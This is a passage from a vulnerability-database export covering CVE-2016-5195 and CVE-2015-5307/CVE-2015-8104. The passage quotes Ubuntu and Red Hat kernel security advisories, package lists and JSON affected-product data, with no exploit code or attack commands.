        "id": "93793"
      },
      {
        "db": "PACKETSTORM",
        "id": "139337"
      },
      {
        "db": "PACKETSTORM",
        "id": "139255"
      },
      {
        "db": "PACKETSTORM",
        "id": "141870"
      },
      {
        "db": "PACKETSTORM",
        "id": "139250"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULMON",
        "id": "CVE-2016-5195"
      },
      {
        "db": "BID",
        "id": "93793"
      },
      {
        "db": "PACKETSTORM",
        "id": "139337"
      },
      {
        "db": "PACKETSTORM",
        "id": "139255"
      },
      {
        "db": "PACKETSTORM",
        "id": "141870"
      },
      {
        "db": "PACKETSTORM",
        "id": "139250"
      },
      {
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2016-11-10T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-5195"
      },
      {
        "date": "2016-10-19T00:00:00",
        "db": "BID",
        "id": "93793"
      },
      {
        "date": "2016-10-26T14:03:09",
        "db": "PACKETSTORM",
        "id": "139337"
      },
      {
        "date": "2016-10-20T15:37:52",
        "db": "PACKETSTORM",
        "id": "139255"
      },
      {
        "date": "2017-03-31T16:11:41",
        "db": "PACKETSTORM",
        "id": "141870"
      },
      {
        "date": "2016-10-20T15:37:15",
        "db": "PACKETSTORM",
        "id": "139250"
      },
      {
        "date": "2016-11-10T21:59:00.197000",
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-11-07T00:00:00",
        "db": "VULMON",
        "id": "CVE-2016-5195"
      },
      {
        "date": "2017-12-19T22:37:00",
        "db": "BID",
        "id": "93793"
      },
      {
        "date": "2023-11-07T02:33:23.770000",
        "db": "NVD",
        "id": "CVE-2016-5195"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "93793"
      },
      {
        "db": "PACKETSTORM",
        "id": "139337"
      },
      {
        "db": "PACKETSTORM",
        "id": "139255"
      },
      {
        "db": "PACKETSTORM",
        "id": "139250"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel CVE-2016-5195 Local Privilege Escalation Vulnerability",
    "sources": [
      {
        "db": "BID",
        "id": "93793"
      }
    ],
    "trust": 0.3
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Design Error",
    "sources": [
      {
        "db": "BID",
        "id": "93793"
      }
    ],
    "trust": 0.3
  }
}

var-201511-0294
Vulnerability from variot

The KVM subsystem in the Linux kernel through 4.2.6, and Xen 4.3.x through 4.6.x, allows guest OS users to cause a denial of service (host OS panic or hang) by triggering many #AC (aka Alignment Check) exceptions, related to svm.c and vmx.c. Linux Kernel is prone to a denial-of-service vulnerability. An attacker with a guest account can exploit this issue to cause an infinite loop in the host, denying service to legitimate users.

This update also fixes the following bugs:

  • When doing TSO/GSO in the presence of VLAN headers on a macvtap device, the header offsets were incorrectly calculated. As a consequence, when 2 guests on the same host communicated over a guest configured VLAN, performance dropped to about 1 Mbps. (BZ#1215914)

  • Prior to this update, TSO acceleration features have been removed from the VLAN device which caused that VLAN performance on top of a virtio device was much lower than that of a virtio device itself. This update re-enables TSO acceleration features, and performance of VLAN devices on top of a virtio device has thus been restored. (BZ#1240988)

  • With an IPv6 address on a bond and a slave failover, Unsolicited Neighbor Advertisement (UNA) was previously sent using the link global IPv6 address as source address. The underlying source code has been patched, and, after the failover in bonding, UNA is sent using both the corresponding link IPv6 address and global IPv6 address of bond0 and bond0.vlan. (BZ#1258480)

  • Previously, Human Interface Device (HID) would run a report on an unaligned buffer, which could cause a page fault interrupt and an oops when the end of the report was read. This update fixes this bug by padding the end of the report with extra bytes, so the reading of the report never crosses a page boundary. As a result, a page fault and subsequent oops no longer occur. (BZ#1268202)

  • Inside hugetlb, region data structures were protected by a combination of a memory map semaphore and a single hugetlb instance mutex. However, a page-fault scalability improvement backported to the kernel on previous releases removed the single hugetlb instance mutex and introduced a new mutex table, making the locking combination insufficient, leading to possible race windows that could cause corruption and undefined behavior. The problem could be seen for example with software mapping or re-mapping hugetlb areas with concurrent threads reading/writing to same areas causing page faults. This update fixes the problem by introducing now a required spinlock to the region tracking functions for proper serialization. The problem only affects software using huge pages through hugetlb interface. (BZ#1274597)

  • Previously, VLAN stacked on the macvlan or macvtap device did not work for devices that implement and use VLAN filters. As a consequence, macvtap passthrough mode failed to transfer VLAN packets over the be2net driver. This update implements VLAN ndo calls to the macvlan driver to pass appropriate VLAN tag IDs to lower devices. As a result, macvtap transfers VLAN packets over be2net successfully. Content-Disposition: inline

==========================================================================Ubuntu Security Notice USN-2801-1 November 10, 2015

linux vulnerability

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 14.04 LTS

Summary:

The system could be made to crash under certain conditions.

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 14.04 LTS: linux-image-3.13.0-68-generic 3.13.0-68.111 linux-image-3.13.0-68-generic-lpae 3.13.0-68.111 linux-image-3.13.0-68-lowlatency 3.13.0-68.111 linux-image-3.13.0-68-powerpc-e500 3.13.0-68.111 linux-image-3.13.0-68-powerpc-e500mc 3.13.0-68.111 linux-image-3.13.0-68-powerpc-smp 3.13.0-68.111 linux-image-3.13.0-68-powerpc64-emb 3.13.0-68.111 linux-image-3.13.0-68-powerpc64-smp 3.13.0-68.111

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well. 7.1) - ppc64, s390x, x86_64

  1. A flaw was found in the way the Linux kernel's file system implementation handled rename operations in which the source was inside and the destination was outside of a bind mount. (CVE-2015-5307, Important)

  2. A race condition flaw was found in the way the Linux kernel's IPC subsystem initialized certain fields in an IPC object structure that were later used for permission checking before inserting the object into a globally visible list. A local, unprivileged user could potentially use this flaw to elevate their privileges on the system.

This update also fixes the following bugs and adds one enhancement:

  • When setting up an ESP IPsec connection, the aes_ctr algorithm did not work for ESP on a Power little endian VM host. As a consequence, a kernel error was previously returned and the connection failed to be established. (BZ#1247127)

  • The redistribute3() function distributed entries across 3 nodes. However, some entries were moved an incorrect way, breaking the ordering. As a result, BUG() in the dm-btree-remove.c:shift() function occurred when entries were removed from the btree. (BZ#1263945)

  • When booting an mpt2sas adapter in a huge DDW enabled slot on Power, the kernel previously generated a warning followed by a call trace. The provided patch set enhances the Power kernel to be able to support IOMMU as a fallback for the cases where the coherent mask of the device is not suitable for direct DMA. As a result, neither the warning nor the call trace occur in this scenario. (BZ#1267133)

  • If the client mounted /exports and tried to execute the "chown -R" command across the entire mountpoint, a warning about a circular directory structure was previously returned because mount points all had the same inode number. (BZ#1275149)

  • The NFS client could previously fail to send a CLOSE operation if the file was opened with O_WRONLY and the server restarted after the OPEN. Consequently, the server appeared in a state that could block other NFS operations from completing. The client's state flags have been modified to catch this condition and correctly CLOSE the file. (BZ#1275298)

  • This update sets multicast filters for multicast packets when the interface is not in promiscuous mode. This change has an impact on the RAR usage such that SR-IOV has some RARs reserved for its own usage as well. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2015:2552-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-2552.html Issue date: 2015-12-08 CVE Names: CVE-2015-5307 CVE-2015-8104 =====================================================================

  1. Summary:

Updated kernel packages that fix two security issues, several bugs, and add one enhancement are now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

  1. It was found that the x86 ISA (Instruction Set Architecture) is prone to a denial of service attack inside a virtualized environment in the form of an infinite loop in the microcode due to the way (sequential) delivering of benign exceptions such as #AC (alignment check exception) and #DB (debug exception) is handled. A privileged user inside a guest could use these flaws to create denial of service conditions on the host kernel. (CVE-2015-5307, CVE-2015-8104, Important)

Red Hat would like to thank Ben Serebrin of Google Inc. for reporting the CVE-2015-5307 issue.

This update also fixes the following bugs:

  • On Intel Xeon v5 platforms, the processor frequency was always tied to the highest possible frequency. Switching p-states on these client platforms failed. This update sets the idle frequency, busy frequency, and processor frequency values by determining the range and adjusting the minimal and maximal percent limit values. Now, switching p-states on the aforementioned client platforms proceeds successfully. (BZ#1273926)

  • Due to a validation error of in-kernel memory-mapped I/O (MMIO) tracing, a VM became previously unresponsive when connected to Red Hat Enterprise Virtualization Hypervisor. The provided patch fixes this bug by dropping the check in MMIO handler, and a VM continues running as expected. (BZ#1275150)

  • Due to retry-able command errors, the NVMe driver previously leaked I/O descriptors and DMA mappings. As a consequence, the kernel could become unresponsive during the hot-unplug operation if a driver was removed. This update fixes the driver memory leak bug on command retries, and the kernel no longer hangs in this situation. (BZ#1279792)

  • The hybrid_dma_data() function was not initialized before use, which caused an invalid memory access when hot-plugging a PCI card. As a consequence, a kernel oops occurred. The provided patch makes sure hybrid_dma_data() is initialized before use, and the kernel oops no longer occurs in this situation. (BZ#1279793)

  • When running PowerPC (PPC) KVM guests and the host was experiencing a lot of page faults, for example because it was running low on memory, the host sometimes triggered an incorrect kind of interrupt in the guest: a data storage exception instead of a data segment exception. This caused a kernel panic of the PPC KVM guest. With this update, the host kernel synthesizes a segment fault if the corresponding Segment Lookaside Buffer (SLB) lookup fails, which prevents the kernel panic from occurring. (BZ#1281423)

  • The kernel accessed an incorrect area of the khugepaged process causing Logical Partitioning (LPAR) to become unresponsive, and an oops occurred in medlp5. The backported upstream patch prevents an LPAR hang, and the oops no longer occurs. (BZ#1281424)

  • When the sctp module was loaded and a route to an association endpoint was removed after receiving an Out-of-The-Blue (OOTB) chunk but before incrementing the "dropped because of missing route" SNMP statistic, a Null Pointer Dereference kernel panic previously occurred. This update fixes the race condition between OOTB response and route removal. (BZ#1281426)

  • The cpuscaling test of the certification test suite previously failed due to a rounding bug in the intel-pstate driver. This bug has been fixed and the cpuscaling test now passes. (BZ#1281491)

All kernel users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. The system must be rebooted for this update to take effect.

  1. Solution:

Before applying this update, make sure all previously released errata relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

  1. Bugs fixed (https://bugzilla.redhat.com/):

1277172 - CVE-2015-5307 virt: guest to host DoS by triggering an infinite loop in microcode via #AC exception 1278496 - CVE-2015-8104 virt: guest to host DoS by triggering an infinite loop in microcode via #DB exception

  1. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: kernel-3.10.0-327.3.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-327.3.1.el7.noarch.rpm kernel-doc-3.10.0-327.3.1.el7.noarch.rpm

x86_64: kernel-3.10.0-327.3.1.el7.x86_64.rpm kernel-debug-3.10.0-327.3.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm kernel-devel-3.10.0-327.3.1.el7.x86_64.rpm kernel-headers-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-327.3.1.el7.x86_64.rpm perf-3.10.0-327.3.1.el7.x86_64.rpm perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm python-perf-3.10.0-327.3.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-327.3.1.el7.x86_64.rpm perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source: kernel-3.10.0-327.3.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-327.3.1.el7.noarch.rpm kernel-doc-3.10.0-327.3.1.el7.noarch.rpm

x86_64: kernel-3.10.0-327.3.1.el7.x86_64.rpm kernel-debug-3.10.0-327.3.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm kernel-devel-3.10.0-327.3.1.el7.x86_64.rpm kernel-headers-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-327.3.1.el7.x86_64.rpm perf-3.10.0-327.3.1.el7.x86_64.rpm perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm python-perf-3.10.0-327.3.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-327.3.1.el7.x86_64.rpm perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source: kernel-3.10.0-327.3.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-327.3.1.el7.noarch.rpm kernel-doc-3.10.0-327.3.1.el7.noarch.rpm

ppc64: kernel-3.10.0-327.3.1.el7.ppc64.rpm kernel-bootwrapper-3.10.0-327.3.1.el7.ppc64.rpm kernel-debug-3.10.0-327.3.1.el7.ppc64.rpm kernel-debug-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm kernel-debug-devel-3.10.0-327.3.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-327.3.1.el7.ppc64.rpm kernel-devel-3.10.0-327.3.1.el7.ppc64.rpm kernel-headers-3.10.0-327.3.1.el7.ppc64.rpm kernel-tools-3.10.0-327.3.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm kernel-tools-libs-3.10.0-327.3.1.el7.ppc64.rpm perf-3.10.0-327.3.1.el7.ppc64.rpm perf-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm python-perf-3.10.0-327.3.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm

ppc64le: kernel-3.10.0-327.3.1.el7.ppc64le.rpm kernel-bootwrapper-3.10.0-327.3.1.el7.ppc64le.rpm kernel-debug-3.10.0-327.3.1.el7.ppc64le.rpm kernel-debug-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-327.3.1.el7.ppc64le.rpm kernel-devel-3.10.0-327.3.1.el7.ppc64le.rpm kernel-headers-3.10.0-327.3.1.el7.ppc64le.rpm kernel-tools-3.10.0-327.3.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm kernel-tools-libs-3.10.0-327.3.1.el7.ppc64le.rpm perf-3.10.0-327.3.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm python-perf-3.10.0-327.3.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm

s390x: kernel-3.10.0-327.3.1.el7.s390x.rpm kernel-debug-3.10.0-327.3.1.el7.s390x.rpm kernel-debug-debuginfo-3.10.0-327.3.1.el7.s390x.rpm kernel-debug-devel-3.10.0-327.3.1.el7.s390x.rpm kernel-debuginfo-3.10.0-327.3.1.el7.s390x.rpm kernel-debuginfo-common-s390x-3.10.0-327.3.1.el7.s390x.rpm kernel-devel-3.10.0-327.3.1.el7.s390x.rpm kernel-headers-3.10.0-327.3.1.el7.s390x.rpm kernel-kdump-3.10.0-327.3.1.el7.s390x.rpm kernel-kdump-debuginfo-3.10.0-327.3.1.el7.s390x.rpm kernel-kdump-devel-3.10.0-327.3.1.el7.s390x.rpm perf-3.10.0-327.3.1.el7.s390x.rpm perf-debuginfo-3.10.0-327.3.1.el7.s390x.rpm python-perf-3.10.0-327.3.1.el7.s390x.rpm python-perf-debuginfo-3.10.0-327.3.1.el7.s390x.rpm

x86_64: kernel-3.10.0-327.3.1.el7.x86_64.rpm kernel-debug-3.10.0-327.3.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm kernel-devel-3.10.0-327.3.1.el7.x86_64.rpm kernel-headers-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-327.3.1.el7.x86_64.rpm perf-3.10.0-327.3.1.el7.x86_64.rpm perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm python-perf-3.10.0-327.3.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64: kernel-debug-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm kernel-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm kernel-debuginfo-common-ppc64-3.10.0-327.3.1.el7.ppc64.rpm kernel-tools-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm kernel-tools-libs-devel-3.10.0-327.3.1.el7.ppc64.rpm perf-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm python-perf-debuginfo-3.10.0-327.3.1.el7.ppc64.rpm

ppc64le: kernel-debug-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm kernel-debug-devel-3.10.0-327.3.1.el7.ppc64le.rpm kernel-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm kernel-debuginfo-common-ppc64le-3.10.0-327.3.1.el7.ppc64le.rpm kernel-tools-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm kernel-tools-libs-devel-3.10.0-327.3.1.el7.ppc64le.rpm perf-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm python-perf-debuginfo-3.10.0-327.3.1.el7.ppc64le.rpm

x86_64: kernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-327.3.1.el7.x86_64.rpm perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source: kernel-3.10.0-327.3.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-327.3.1.el7.noarch.rpm kernel-doc-3.10.0-327.3.1.el7.noarch.rpm

x86_64: kernel-3.10.0-327.3.1.el7.x86_64.rpm kernel-debug-3.10.0-327.3.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm kernel-devel-3.10.0-327.3.1.el7.x86_64.rpm kernel-headers-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-327.3.1.el7.x86_64.rpm perf-3.10.0-327.3.1.el7.x86_64.rpm perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm python-perf-3.10.0-327.3.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64: kernel-debug-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-327.3.1.el7.x86_64.rpm perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.3.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2015-5307 https://access.redhat.com/security/cve/CVE-2015-8104 https://access.redhat.com/security/updates/classification/#important

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

iD8DBQFWZubYXlSAg2UNWIIRAsvDAJ46kkXWcTnnN5EtbqyO0fc2+uZZawCeNnnr 2T4VNHyutcGOZycd46ObXOk= =v6PE -----END PGP SIGNATURE-----

-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce

Show details on source website


{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201511-0294",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "xen",
        "version": "4.3.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "xen",
        "version": "4.4.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "xen",
        "version": "4.3.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "xen",
        "version": "4.4.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.3,
        "vendor": "xen",
        "version": "4.5.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.3.4"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.6.6"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.6.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.2.0"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "15.10"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.6.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.1.42"
      },
      {
        "model": "vm virtualbox",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.0.34"
      },
      {
        "model": "vm virtualbox",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.2.34"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.3.3"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "14.04"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "8.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.5.1"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.5.3"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.5.5"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "vm virtualbox",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.3.29"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.4.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "5.0.0"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "7.0"
      },
      {
        "model": "vm virtualbox",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.3.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.3.2"
      },
      {
        "model": "kernel",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "linux",
        "version": "4.2.3"
      },
      {
        "model": "vm virtualbox",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "4.1.0"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
        "version": "4.4.2"
      },
      {
        "model": "xen",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "xen",
